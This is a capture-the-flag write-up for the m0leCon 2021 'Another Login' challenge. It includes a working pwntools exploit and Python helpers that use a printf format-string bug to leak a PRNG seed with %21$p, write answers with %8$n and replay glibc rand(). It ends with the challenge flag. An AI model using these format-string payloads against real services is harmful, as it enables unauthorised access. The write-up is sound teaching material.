[Link to original writeup](https://wrecktheline.com/writeups/m0lecon-2021/#login1_writeup)

# Another Login (29 solves, 160 points)  
by FeDEX

```  
Just another simple login bypass challenge.

nc challs.m0lecon.it 1907

Author: Alberto247  
```

We are given a binary and a remote endpoint:  
```  
$ file chall  
chall: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically
linked, interpreter /lib64/ld-linux-x86-64.so.2,
BuildID[sha1]=7d6890a38b10cab434c876854ab80f742d3abf77, for GNU/Linux 3.2.0,
not stripped  
```

Reversing the binary is pretty straightforward. It reads 4 random bytes from
`/dev/urandom` and uses them to seed `srandom()`.  
It then generates 15 pairs of numbers, `public | private`, and for each pair asks
us for the sum of the two.

However, our input is passed straight to `printf()` as the format string. This lets
us leak the seed from the stack with `%21$p` and, with `%8$n`, write the number of
bytes printed so far into `int_input`, the integer the program checks our answer
against. Because the leak arrives in the same `printf()` call that has to answer
the first round, the script simply guesses 190 for that round (the 18 bytes of the
leaked pointer plus 172 bytes of padding) and reconnects until the guess happens
to be right; once it is, it seeds the local libc with the leaked value and
precalculates all remaining pairs:

```python
#!/usr/bin/env python3
# Ported to Python 3 / current pwntools; the original script was Python 2.
from pwn import remote
from hashlib import sha256
from itertools import product
import ctypes
import re

remote_server, PORT = "challs.m0lecon.it", 1907

# The challenge seeds glibc's PRNG, so we replay it with the local libc
# (glibc's rand()/srand() are the same generator as random()/srandom()).
libc_native = ctypes.CDLL("libc.so.6")
libc_native.srand.argtypes = [ctypes.c_uint]

if __name__ == "__main__":

    while 1:

        ######################################## POW

        p = remote(remote_server, PORT)

        ret = p.recvline().strip().decode()
        prefix, suffix = re.findall(r"Give me a string starting with (.+) such that its sha256sum ends in (.+).", ret)[0]

        # Brute-force 5 printable characters until sha256(prefix + x) ends in the suffix
        for i_list in product(list(range(32, 128)), repeat=5):
            c_list = list(map(chr, i_list))
            tmp = prefix + "".join(c_list)
            tmp_hash = sha256(tmp.encode()).hexdigest()
            if tmp_hash[-5:] == suffix:
                print("found!")
                p.sendline(tmp.encode())
                break
        else:
            print("not found...")

        ######################################## EXPLOIT

        p.recvline()

        p.recvuntil(b'Give me the 1 secret, summed to')
        looking = p.recvline().strip().decode().replace('!', '')
        print('Value now is >>', looking, '<<')

        payload = '%21$p'   # leak seed from stack
        payload += '%172c'  # pad so that 190 bytes have been printed in total
        payload += '%8$n'   # put value 190 at int_input (blind guess for round 1)

        p.sendline(payload.encode())

        data = p.recvline()
        data = p.recvline().decode()
        print('SEED=', data[2:10])

        seed = int(data[2:10], 16)

        libc_native.srand(seed)
        caca = libc_native.rand() % 255
        print('GENERATED I got', libc_native.rand() % 8 + 2, caca)

        # The first answer was a guess: reconnect until 190 happens to be the right sum
        if b'NOPE' in p.recvline():
            p.close()
            continue
        else:
            print('MATCH!!!')
            # gdb.attach(p)

            # From here on every pair is known, so %n writes the exact sum each round
            for i in range(15):
                val1 = libc_native.rand() % 256
                val2 = libc_native.rand() % 8 + 2
                p.sendline(('%' + str(val1 + val2) + 'c' + '%8$n').encode())

            # ============ GDB =========== #

            p.interactive()
```
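As an added example that is not part of the original writeup: the seed replay and the `%n` padding arithmetic used above, in plain Python with no dependency on the local libc. `glibc_random()` reimplements glibc's `srandom()`/`random()` (the default TYPE_3 additive generator, which `srand()`/`rand()` share), `predict_rounds()` derives the `public`/`private` pairs with the `% 256` and `% 8 + 2` reductions from the script, and `write_payload()` together with `simulate_printf()` show why the first payload pads with `%172c`: the 18 bytes of the leaked pointer count towards `%n` as well. The stack slot contents, the 18-byte pointer length and the simplified `%n` model (the slot itself receives the count, instead of the write going through a pointer stored there) are assumptions made for the simulation, not values taken from the challenge binary.

```python
import re


def glibc_random(seed):
    """Yield the values glibc's random()/rand() return after srandom(seed)/srand(seed).

    Mirrors glibc's __srandom_r/__random_r: a 31-word additive feedback generator
    whose state is filled by a 16807-multiplier LCG, with the first 310 outputs
    discarded. Reimplemented here so the replay does not need ctypes/libc.so.6.
    """
    seed &= 0xFFFFFFFF
    if seed == 0:                       # glibc substitutes 1 for a zero seed
        seed = 1
    word = seed - (1 << 32) if seed >= (1 << 31) else seed   # glibc keeps it in an int32_t
    state = [word]
    for _ in range(1, 31):
        # Schrage's method for (16807 * word) % 2147483647 with C-style truncating division
        hi = -(-word // 127773) if word < 0 else word // 127773
        lo = word - hi * 127773
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        state.append(word)
    state = [x & 0xFFFFFFFF for x in state]
    front, back = 3, 0                  # rand_sep = 3, rand_deg = 31
    emitted = 0
    while True:
        state[front] = (state[front] + state[back]) & 0xFFFFFFFF
        value = state[front] >> 1       # glibc drops the least significant bit
        front = (front + 1) % 31
        back = (back + 1) % 31
        emitted += 1
        if emitted > 310:               # srandom() burns 10 * rand_deg outputs
            yield value


def predict_rounds(seed, rounds):
    """Return the (public, private) pairs the exploit script computes from the leaked seed."""
    rng = glibc_random(seed)
    pairs = []
    for _ in range(rounds):
        public = next(rng) % 256
        private = next(rng) % 8 + 2
        pairs.append((public, private))
    return pairs


def write_payload(target, write_idx, already_printed=0, leak_idx=None):
    """Build '%<leak>$p%<pad>c%<write>$n' so that %n stores `target` into slot `write_idx`.

    %n writes the number of bytes printed so far, so the %c padding must be reduced
    by whatever earlier conversions emitted (18 for a %p showing 16 hex digits).
    """
    pad = target - already_printed
    if pad < 0:
        raise ValueError("target is below the bytes already printed; needs %hn/%hhn wraparound")
    fmt = f"%{leak_idx}$p" if leak_idx is not None else ""
    if pad > 0:
        fmt += f"%{pad}c"
    return fmt + f"%{write_idx}$n"


_SPEC = re.compile(r"%(?:(\d+)\$)?(\d*)([pcn])")


def simulate_printf(fmt, stack):
    """Minimal model of printf(fmt) for %p, %c and %n; returns (output, stack after %n writes).

    `stack` is a list of integers standing in for the argument slots (1-based for %k$).
    A plain %c consumes the next sequential slot, as real printf does. Assumption for
    the model: %k$n stores the byte count into slot k itself rather than through a pointer.
    """
    stack = list(stack)
    out, written, seq, pos = [], 0, 0, 0
    for m in _SPEC.finditer(fmt):
        literal = fmt[pos:m.start()]
        out.append(literal)
        written += len(literal)
        pos = m.end()
        idx, width, conv = m.groups()
        if idx is not None:
            slot = int(idx) - 1
        else:
            slot, seq = seq, seq + 1
        if conv == "p":
            text = f"0x{stack[slot]:x}"
        elif conv == "c":
            text = chr(stack[slot] & 0xFF).rjust(max(int(width or "0"), 1))
        else:                           # %n: no output, record the running byte count
            stack[slot] = written
            continue
        out.append(text)
        written += len(text)
    out.append(fmt[pos:])
    return "".join(out), stack
```

`write_payload(190, 8, already_printed=18, leak_idx=21)` reproduces the script's first payload, and running it through `simulate_printf()` with a constructed 16-hex-digit value in slot 21 leaves 190 in slot 8; `write_payload(sum, 8)` gives the per-round `%<sum>c%8$n` form. The `ValueError` covers the case the script never hits: a target smaller than what the leak has already printed, which would need a short write and integer wraparound instead.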

- flag: `ptm{D1d_u_r3ad_th3_0per4t0r_m4nua1_b3f0re_l0gging_1n?}`
